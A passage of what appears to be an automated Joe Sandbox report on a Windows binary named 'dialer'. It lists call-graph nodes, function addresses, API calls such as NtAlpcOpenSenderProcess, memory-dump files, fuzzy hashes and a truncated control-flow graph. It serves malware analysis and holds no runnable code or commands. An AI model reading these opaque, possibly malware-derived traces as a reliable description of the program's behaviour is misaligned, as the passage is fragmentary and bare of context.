14000157b 2321->2533 2322->2321 2324 1400046bf memset 2326 1400046ee 2324->2326 2325 140004733 wcscpy wcscat wcslen 2574 14000146d 2325->2574 2326->2325 2330 1400046a9 2331 14000145e 2 API calls 2330->2331 2334 1400046a4 2331->2334 2332 1400048d3 2339 140004912 memset 2332->2339 2333 14000157b 2 API calls 2367 14000414d 2333->2367 2334->2324 2337 140004843 2660 1400014a9 2337->2660 2338 1400048ef 2341 14000145e 2 API calls 2338->2341 2343 140006283 2339->2343 2344 140004936 wcscpy wcscat wcslen 2339->2344 2341->2332 2366 140004a60 2344->2366 2347 14000145e 2 API calls 2347->2367 2348 1400048df 2352 14000145e 2 API calls 2348->2352 2350 1400044d4 _wcsnicmp 2354 14000468c 2350->2354 2350->2367 2352->2332 2356 14000145e 2 API calls 2354->2356 2355 1400048c7 2357 14000145e 2 API calls 2355->2357 2360 140004698 2356->2360 2357->2332 2358 140004532 _wcsnicmp 2358->2354 2358->2367 2359 140004b59 wcslen 2361 14000153f 2 API calls 2359->2361 2362 14000145e 2 API calls 2360->2362 2361->2366 2362->2334 2363 140005d9f memcpy 2363->2366 2364 140004586 _wcsnicmp 2364->2354 2364->2367 2365 14000145e NtAlpcOpenSenderProcess malloc 2365->2366 2366->2359 2366->2363 2366->2365 2369 140004ccd wcslen 2366->2369 2371 14000513d wcslen 2366->2371 2372 140004ed9 wcslen 2366->2372 2375 140005a31 wcscpy wcscat wcslen 2366->2375 2376 140005f6d memcpy 2366->2376 2377 140004f5c memset 2366->2377 2379 140004fc6 wcslen 2366->2379 2383 14000502e _wcsnicmp 2366->2383 2384 140005b7c 2366->2384 2385 140005c27 wcslen 2366->2385 2387 1400057d5 memset 2366->2387 2388 1400027d0 11 API calls 2366->2388 2389 1400059d0 memset 2366->2389 2390 14000583b memset 2366->2390 2391 140005895 wcscpy wcscat wcslen 2366->2391 2776 1400014d6 2366->2776 2821 140001521 2366->2821 2919 140001431 2366->2919 2367->2324 2367->2330 2367->2333 2367->2347 2367->2350 2367->2358 2367->2364 2368 140004357 wcsstr 2367->2368 2550 140001599 2367->2550 2563 1400015a8 2367->2563 2368->2354 2368->2367 2370 14000153f 2 API calls 2369->2370 2370->2366 2373 14000153f 2 API calls 2371->2373 2374 14000157b 2 API calls 2372->2374 2373->2366 2374->2366 2378 140001422 2 API calls 2375->2378 2376->2366 2377->2366 2378->2366 2380 1400015a8 2 API calls 2379->2380 2380->2366 2383->2366 2384->2265 2386 1400015a8 2 API calls 2385->2386 2386->2366 2387->2366 2387->2389 2388->2366 2389->2366 2390->2366 2850 140001422 2391->2850 2394 140001394 2 API calls 2393->2394 2395 14000154e 2394->2395 2396 140001394 2 API calls 2395->2396 2397 14000155d 2396->2397 2398 140001394 2 API calls 2397->2398 2399 14000156c 2398->2399 2400 140001394 2 API calls 2399->2400 2401 14000157b 2400->2401 2402 140001394 2 API calls 2401->2402 2403 14000158a 2402->2403 2404 140001394 2 API calls 2403->2404 2405 140001599 2404->2405 2406 140001394 2 API calls 2405->2406 2407 1400015a8 2406->2407 2408 140001394 2 API calls 2407->2408 2409 1400015b7 2408->2409 2410 140001394 2 API calls 2409->2410 2411 1400015c6 2410->2411 2412 140001394 2 API calls 2411->2412 2413 1400015d5 2412->2413 2414 140001394 2 API calls 2413->2414 2415 1400015e4 2414->2415 2416 140001394 2 API calls 2415->2416 2417 1400015f3 2416->2417 2417->2288 2418 140001503 2417->2418 2419 140001394 2 API calls 2418->2419 2420 14000150d 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001512 2421->2422 2423 140001394 2 API calls 2422->2423 2424 140001521 2423->2424 2425 140001394 2 API calls 2424->2425 2426 140001530 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000153f 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000154e 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000155d 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000156c 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000157b 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000158a 2437->2438 2439 140001394 2 API calls 2438->2439 2440 140001599 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015a8 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015b7 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015c6 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015d5 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015e4 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015f3 2451->2452 2452->2291 2453 14000156c 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000157b 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000158a 2456->2457 2458 140001394 2 API calls 2457->2458 2459 140001599 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015a8 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015b7 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015c6 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015d5 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015e4 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015f3 2470->2471 2471->2291 2472 14000145e 2471->2472 2473 140001394 2 API calls 2472->2473 2474 14000146d 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000147c 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000148b 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000149a 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014a9 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014b8 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014c7 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014d6 2487->2488 2489 1400014e5 2488->2489 2490 140001394 2 API calls 2488->2490 2491 140001394 2 API calls 2489->2491 2490->2489 2492 1400014ef 2491->2492 2493 1400014f4 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014fe 2495->2496 2497 140001503 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 14000150d 2499->2500 2501 140001394 2 API calls 2500->2501 2502 140001512 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001521 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001530 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000153f 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000154e 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000155d 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000156c 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000157b 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000158a 2517->2518 2519 140001394 2 API calls 2518->2519 2520 140001599 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015a8 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015b7 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015c6 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015d5 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015e4 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015f3 2531->2532 2532->2291 2534 140001394 2 API calls 2533->2534 2535 14000158a 2534->2535 2536 140001394 2 API calls 2535->2536 2537 140001599 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400015a8 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015b7 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015c6 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015d5 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015e4 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015f3 2548->2549 2549->2367 2551 140001394 2 API calls 2550->2551 2552 1400015a8 2551->2552 2553 140001394 2 API calls 2552->2553 2554 1400015b7 2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015c6 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015d5 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015e4 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015f3 2561->2562 2562->2367 2564 140001394 2 API calls 2563->2564 2565 1400015b7 2564->2565 2566 140001394 2 API calls 2565->2566 2567 1400015c6 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015d5 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015e4 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015f3 2572->2573 2573->2367 2575 140001394 2 API calls 2574->2575 2576 14000147c 2575->2576 2577 140001394 2 API calls 2576->2577 2578 14000148b 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000149a 2579->2580 2581 140001394 2 API calls 2580->2581 2582 1400014a9 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014b8 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014c7 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014d6 2587->2588 2589 1400014e5 2588->2589 2590 140001394 2 API calls 2588->2590 2591 140001394 2 API calls 2589->2591 2590->2589 2592 1400014ef 2591->2592 2593 1400014f4 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014fe 2595->2596 2597 140001503 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 14000150d 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001512 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001521 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001530 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000153f 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000154e 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000155d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000156c 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000157b 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000158a 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001599 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015a8 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015b7 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015c6 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015d5 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015e4 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015f3 2631->2632 2632->2332 2633 140001530 2632->2633 2634 140001394 2 API calls 2633->2634 2635 14000153f 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000154e 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000155d 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000156c 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000157b 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000158a 2644->2645 2646 140001394 2 API calls 2645->2646 2647 140001599 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015a8 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015b7 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015c6 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015d5 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015e4 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015f3 2658->2659 2659->2337 2659->2338 2661 140001394 2 API calls 2660->2661 2662 1400014b8 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400014c7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014d6 2665->2666 2667 1400014e5 2666->2667 2668 140001394 2 API calls 2666->2668 2669 140001394 2 API calls 2667->2669 2668->2667 2670 1400014ef 2669->2670 2671 1400014f4 2670->2671 2672 140001394 2 API calls 2670->2672 2673 140001394 2 API calls 2671->2673 2672->2671 2674 1400014fe 2673->2674 2675 140001503 2674->2675 2676 140001394 2 API calls 2674->2676 2677 140001394 2 API calls 2675->2677 2676->2675 2678 14000150d 2677->2678 2679 140001394 2 API calls 2678->2679 2680 140001512 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001521 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001530 2683->2684 2685 140001394 2 API calls 2684->2685 2686 14000153f 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000154e 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000155d 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000156c 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000157b 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000158a 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001599 2697->2698 2699 140001394 2 API calls 2698->2699 2700 1400015a8 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015b7 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015c6 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015d5 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015e4 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015f3 2709->2710 2710->2348 2711 140001440 2710->2711 2712 140001394 2 API calls 2711->2712 2713 14000144f 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000145e 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000146d 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000147c 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000148b 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000149a 2722->2723 2724 140001394 2 API calls 2723->2724 2725 1400014a9 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014b8 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014c7 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014d6 2730->2731 2732 1400014e5 2731->2732 2733 140001394 2 API calls 2731->2733 2734 140001394 2 API calls 2732->2734 2733->2732 2735 1400014ef 2734->2735 2736 1400014f4 2735->2736 2737 140001394 2 API calls 2735->2737 2738 140001394 2 API calls 2736->2738 2737->2736 2739 1400014fe 2738->2739 2740 140001503 2739->2740 2741 140001394 2 API calls 2739->2741 2742 140001394 2 API calls 2740->2742 2741->2740 2743 14000150d 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001512 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001521 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001530 2748->2749 2750 140001394 2 API calls 2749->2750 2751 14000153f 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000154e 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000155d 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000156c 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000157b 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000158a 2760->2761 2762 140001394 2 API calls 2761->2762 2763 140001599 2762->2763 2764 140001394 2 API calls 2763->2764 2765 1400015a8 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015b7 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015c6 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015d5 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015e4 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015f3 2774->2775 2775->2348 2775->2355 2777 1400014e5 2776->2777 2778 140001394 2 API calls 2776->2778 2779 140001394 2 API calls 2777->2779 2778->2777 2780 1400014ef 2779->2780 2781 1400014f4 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014fe 2783->2784 2785 140001503 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 14000150d 2787->2788 2789 140001394 2 API calls 2788->2789 2790 140001512 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001521 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001530 2793->2794 2795 140001394 2 API calls 2794->2795 2796 14000153f 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000154e 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000155d 2799->2800 2801 140001394 2 API calls 2800->2801 2802 14000156c 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000157b 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000158a 2805->2806 2807 140001394 2 API calls 2806->2807 2808 140001599 2807->2808 2809 140001394 2 API calls 2808->2809 2810 1400015a8 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015b7 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015c6 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015d5 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015e4 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015f3 2819->2820 2820->2366 2822 140001394 2 API calls 2821->2822 2823 140001530 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000153f 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000154e 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000155d 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000156c 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000157b 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000158a 2834->2835 2836 140001394 2 API calls 2835->2836 2837 140001599 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015a8 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015b7 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015c6 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015d5 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015e4 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015f3 2848->2849 2849->2366 2851 140001394 2 API calls 2850->2851 2852 140001431 2851->2852 2853 140001394 2 API calls 2852->2853 2854 140001440 2853->2854 2855 140001394 2 API calls 2854->2855 2856 14000144f 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000145e 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000146d 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000147c 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000148b 2863->2864 2865 140001394 2 API calls 2864->2865 2866 14000149a 2865->2866 2867 140001394 2 API calls 2866->2867 2868 1400014a9 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014b8 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014c7 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014d6 2873->2874 2875 1400014e5 2874->2875 2876 140001394 2 API calls 2874->2876 2877 140001394 2 API calls 2875->2877 2876->2875 2878 1400014ef 2877->2878 2879 1400014f4 2878->2879 2880 140001394 2 API calls 2878->2880 2881 140001394 2 API calls 2879->2881 2880->2879 2882 1400014fe 2881->2882 2883 140001503 2882->2883 2884 140001394 2 API calls 2882->2884 2885 140001394 2 API calls 2883->2885 2884->2883 2886 14000150d 2885->2886 2887 140001394 2 API calls 2886->2887 2888 140001512 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001521 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001530 2891->2892 2893 140001394 2 API calls 2892->2893 2894 14000153f 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000154e 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000155d 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000156c 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000157b 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000158a 2903->2904 2905 140001394 2 API calls 2904->2905 2906 140001599 2905->2906 2907 140001394 2 API calls 2906->2907 2908 1400015a8 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015b7 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015c6 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015d5 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015e4 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015f3 2917->2918 2918->2366 2920 140001394 2 API calls 2919->2920 2921 140001440 2920->2921 2922 140001394 2 API calls 2921->2922 2923 14000144f 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000145e 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000146d 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2366

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                      callgraph 0 Function_00000001400026E1 1 Function_00000001400031E1 2 Function_00000001400063E1 3 Function_0000000140001AE4 35 Function_0000000140001D40 3->35 78 Function_0000000140001BA0 3->78 4 Function_00000001400014E5 74 Function_0000000140001394 4->74 5 Function_0000000140002FF0 61 Function_0000000140001370 5->61 6 Function_00000001400010F0 7 Function_00000001400062F1 8 Function_00000001400014F4 8->74 9 Function_0000000140001800 69 Function_0000000140002290 9->69 10 Function_0000000140006600 11 Function_0000000140003200 12 Function_0000000140002500 13 Function_0000000140001000 14 Function_0000000140001E00 13->14 42 Function_0000000140001750 13->42 87 Function_0000000140001FB0 13->87 92 Function_0000000140001FC0 13->92 15 Function_0000000140006401 16 Function_0000000140001503 16->74 17 Function_0000000140001404 17->74 18 Function_0000000140002104 19 Function_0000000140001E10 20 Function_0000000140006410 21 Function_0000000140006311 22 Function_0000000140001512 22->74 23 Function_0000000140003220 24 Function_0000000140002320 25 Function_0000000140002420 26 Function_0000000140006620 27 Function_0000000140001521 27->74 28 Function_0000000140001422 28->74 29 Function_0000000140001530 29->74 30 Function_0000000140006630 30->26 31 Function_0000000140001431 31->74 32 Function_0000000140006431 33 Function_0000000140006331 34 Function_000000014000153F 34->74 35->69 36 Function_0000000140001440 36->74 37 Function_0000000140001140 50 Function_0000000140001160 37->50 38 Function_0000000140003240 38->5 38->16 38->26 38->27 38->28 38->29 38->31 38->34 38->36 48 Function_000000014000145E 38->48 49 Function_0000000140002660 38->49 57 Function_000000014000156C 38->57 58 Function_000000014000146D 38->58 38->61 64 Function_000000014000157B 38->64 76 Function_0000000140001599 38->76 84 Function_00000001400015A8 38->84 85 Function_00000001400014A9 38->85 93 Function_00000001400016C0 38->93 99 Function_00000001400027D0 38->99 105 Function_00000001400014D6 38->105 39 Function_0000000140006541 40 Function_0000000140003141 41 Function_0000000140001F47 60 Function_0000000140001870 41->60 43 Function_0000000140001650 44 Function_0000000140002050 45 Function_0000000140002751 46 Function_0000000140006351 47 Function_000000014000155D 47->74 48->74 50->38 50->50 50->60 65 Function_0000000140001880 50->65 68 Function_0000000140001F90 50->68 50->93 51 Function_0000000140001760 107 Function_00000001400020E0 51->107 52 Function_0000000140002460 53 Function_0000000140003160 54 Function_0000000140006461 55 Function_0000000140006561 56 Function_0000000140001E65 56->60 57->74 58->74 59 Function_000000014000216F 62 Function_0000000140001A70 62->35 62->78 63 Function_0000000140002770 64->74 65->25 65->35 65->49 65->78 66 Function_0000000140003180 67 Function_0000000140006381 70 Function_0000000140002590 71 Function_0000000140002790 72 Function_0000000140002691 73 Function_0000000140006491 74->30 106 Function_00000001400068E0 74->106 75 Function_0000000140002194 75->60 76->74 77 Function_000000014000219E 78->35 86 Function_00000001400023B0 78->86 98 Function_00000001400024D0 78->98 79 Function_0000000140001FA0 80 Function_00000001400027A0 81 Function_00000001400031A1 82 Function_00000001400063A1 83 Function_00000001400065A1 84->74 85->74 88 Function_00000001400022B0 89 Function_00000001400026B0 90 Function_00000001400027B1 91 Function_0000000140001AB3 91->35 91->78 94 Function_00000001400062C1 95 Function_00000001400063C1 96 Function_0000000140001AC3 96->35 96->78 97 Function_00000001400014C7 97->74 99->4 99->8 99->16 99->22 99->26 99->47 99->48 99->49 99->61 99->85 99->97 100 Function_00000001400017D0 101 Function_0000000140001FD0 102 Function_00000001400026D0 103 Function_00000001400064D1 104 Function_0000000140001AD4 104->35 104->78 105->74 106->26 108 Function_00000001400017E0 108->107 109 Function_00000001400022E0

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • NtAlpcOpenSenderProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AlpcOpenProcessSender
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3910219020-0
                                                                                                                                                                                                      • Opcode ID: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
                                                                                                                                                                                                      • Instruction ID: 6e9c43e43475a5412bc82c74bb0b22b7dbbc15337bd8e373d78586065a7e04e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFF05FB6608B408AEA16DF62F85179A77A5F79D7C0F009919BBC857735DB3CC1A0CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 396 140002a43-140002a6b call 1400014c7 389->396 397 140002954-140002963 389->397 391->389 393 140002870-140002877 391->393 394 140002879-140002882 393->394 395 140002840-140002842 393->395 398 140002884-14000289b 394->398 399 1400028e8-1400028eb 394->399 403 14000284a-14000285e 395->403 412 140002a76-140002ab8 call 140001503 call 140006620 memset 396->412 413 140002a6d 396->413 401 140002fa7-140002fe4 call 140001370 397->401 402 140002969-140002978 397->402 405 1400028e5 398->405 406 14000289d-1400028b2 398->406 399->403 408 1400029d4-140002a3e wcsncmp call 1400014e5 402->408 409 14000297a-1400029cd 402->409 403->389 403->391 405->399 411 1400028c0-1400028c7 406->411 408->396 409->408 415 1400028c9-1400028e3 411->415 416 1400028f0-1400028f9 411->416 421 140002f39-140002f74 call 140001370 412->421 422 140002abe-140002ac5 412->422 413->412 415->405 415->411 416->403 425 140002ac7-140002afc 421->425 429 140002f7a 421->429 424 140002b03-140002b33 wcscpy wcscat wcslen 422->424 422->425 427 140002b35-140002b66 wcslen 424->427 428 140002b68-140002b95 424->428 425->424 430 140002b98-140002baf wcslen 427->430 428->430 